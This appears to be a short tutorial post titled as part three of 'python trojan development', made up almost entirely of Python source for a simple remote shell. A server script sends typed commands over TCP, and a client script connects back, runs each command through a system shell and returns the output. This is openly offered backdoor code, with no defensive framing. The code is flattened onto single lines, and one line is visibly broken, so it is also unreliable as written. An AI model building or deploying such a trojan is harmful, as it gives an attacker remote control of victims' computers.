python trojan development 3rd —— use python to creative a simple shell
from socket import * import os import time import subprocess target = "" port = 10002 addr = (target,port) buff = 1024 tcpSock = socket(AF_INET, SOCK_STREAM) tcpSock.bind(addr) tcpSock.listen(5) while True: conn,addr=tcpSock.accept() while True: data = input("input the command:\n") conn.send(bytes(data,encoding="utf-8")) getdata = str(conn.recv(buff),encoding="utf-8") if not getdata: break print(getdata) tcpSock.close()
import socket import os import subprocess target = "" port = 10002 addr = (target,port) buff = 1024 cli = socket.socket(socket.AF_INET,socket.SOCK_STREAM) cli.connect(addr) while True: data = str(cli.recv(buff),encoding="utf-8") if not data: break print(data) f =subprocess.Popen(data,shell=True, stdout=subprocess.PIPE).stdout redata = bytes(str(,encoding="utf-8") cli.sendall(redata) cli.close()
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